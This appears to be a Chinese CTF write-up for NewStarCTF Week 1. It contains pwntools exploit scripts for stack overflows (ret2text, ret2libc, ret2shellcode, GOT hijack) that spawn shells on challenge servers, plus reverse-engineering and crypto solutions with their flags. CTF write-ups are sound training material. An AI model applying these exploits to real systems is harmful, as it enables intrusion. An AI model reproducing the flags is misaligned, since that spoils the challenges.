NewStarCTFWEEK1部分题解
NewStarCTFWEEK1
- pwn
-
- ret2text:
- calc:
- ret2libc:
- ret2shellcode:
- fallw1nd’s gift:
- RE
-
- Hello_Reverse:
- Baby_Re:
- CRYPTO:
-
- caeser:
- 吉奥万·巴蒂斯塔·贝拉索先生的密码:
- eazyxor:
pwn
ret2text:
from pwn import*
r= process('./pwn')
#r=remote('node4.buuoj.cn',25509)
elf = ELF('./pwn')
#libc=elf('./libc-2.31.so')
pop_rdi=0x4007d3
backdoor=0x400708
payload='a'*0x20+'b'*8+p64(backdoor)
r.sendline(payload)
r.interactive()
calc:
用python的eval函数自动计算
from pwn import *
#from LibcSearcher import *
local_file = './cala'
local_libc = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('node4.buuoj.cn',25712 )
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
gdb.attach(r,cmd)
#-----------------------------
for i in range(100):
ru('What\'s the answer? ')
sl(str(eval(r.recvuntil('=',drop=True).replace('x','*'))))
r.interactive()
ret2libc:
唯一需要注意的是2.27以上的要用ret调整栈帧
from pwn import *
local_file = './pwn'
local_libc = './libc-2.31.so'
remote_libc = './libc-2.31.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('node4.buuoj.cn',29708 )
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
gdb.attach(r,cmd)
#------------------
pop_rdi=0x400753
ret=0x40050e
payload='a'*0x20+'b'*8+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.sym['puts'])+p64(elf.sym['main'])
sla('Glad to meet you again!What u bring to me this time?\n',payload)
got=uu64(ru('\x7f')[-6:])
base=got-libc.sym['puts']
print hex(base)
system=base+libc.sym['system']
binsh=base+0x1b45bd
payload='a'*0x20+'b'*8+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system)
sla('Glad to meet you again!What u bring to me this time?\n',payload)
#debug()
r.interactive()
ret2shellcode:
from pwn import *
#from LibcSearcher import *
local_file = './shell'
local_libc = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('node4.buuoj.cn',25903 )
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
sla = lambda delim,data :r.sendlineafter(delim, data)
#-----------------------------
sla('Hello my friend.Any gift for me?\n',asm(shellcraft.sh()))
sla('Anything else?\n','a'*0x30+'b'*8+p64(0x233000))
r.interactive()
fallw1nd’s gift:
GOT Hijacking,
gdb调试来确定该怎样输入addr
用objdump -d -M inte ./fallw1nd’s gift 取找puts的plt
from pwn import *
#from LibcSearcher import *
local_file = './fallw1nd_gift'
local_libc = './libc-2.31.so'
remote_libc = './libc-2.31.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('node4.buuoj.cn',25419)
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
gdb.attach(r,cmd)
#----------------------
ru('gift as reward:\n')
puts_got=eval(rc(14))
print hex(puts_got)
base=puts_got-libc.sym['puts']
print hex(base)
system=base+libc.sym['system']
print hex(libc.sym['puts'])
puts_plt=base+libc.sym['puts']
#debug()
sla('now input your addr:\n',str(hex(0x4033f8)).replace('0x',''))
se(p64(system))
#debug()
r.interactive()
RE
Hello_Reverse:
ida shiftf12 发现 flag{h3llo_r
再找到交互函数,发现有个strcpy(&Dest, &Source);
把那些变量都用char显示
组合一下flag{h3llo_r3vers1ng_w0rld}
Baby_Re:
发现0x20的data段的字符串
function_name要对应替换4个char
输入的字符串每个字符异或和data段的字符串的每个字符比较
得出flag
flag{S0meth1ng_run_bef0re_main!}
#Baby_Re
s=[0x66,0x6D,0x63,0x64,0x7F,0x56,0x69,0x6A,0x6D,0x7D,0x62,0x62,0x62,0x6A,0x51,0x7D,0x65,0x7F,0x4D,0x71,0x71,0x73,0x79,0x65,0x7D,0x46,0x77,0x7A,0x75,0x73,0x21,0x62]
s[6]=0x36
s[0xb]=0x3a
s[0x16]=0x26
s[0x1e]=0x3f
#s.reverse()
flag=[]
for i in range(len(s)):
for j in range(128):
if(j^i==s[i]):
flag.append(j)
break
for i in range(len(flag)):
flag[i]=chr(flag[i])
flag=''.join(flag)
print(flag)
CRYPTO:
caeser:
ROT13
flag{historical_cipher_is_vulnerable}
吉奥万·巴蒂斯塔·贝拉索先生的密码:
flag{bruteforce_is_useful_for_breaking_cipher}
对照图表法可得密钥为kfc
维吉尼亚密码转换器_维吉尼亚密码解密加密_维吉尼亚密码在线翻译 (00cha.net)
离谱的是解出这题时室友正在吃kfc
eazyxor:
异或运算,已知155与key异或为chr(‘f’),可求得key=155^102,算出flag为
flag{x0r_i5_qu1t3_3azy}
#eazyxor
from os import urandom
key =155^102
s=[155,145,156,154,134,133,205,143,162,148,200,162,140,136,204,137,206,162,206,156,135,132,128]
#9b919c9a8685cd8fa294c8a28c88cc89cea2ce9c878480
flag=[]
for i in range(len(s)):
for j in range(128):
if(j^key==s[i]):
flag.append(j)
break
for i in range(len(flag)):
flag[i]=chr(flag[i])
flag=''.join(flag)
print(flag)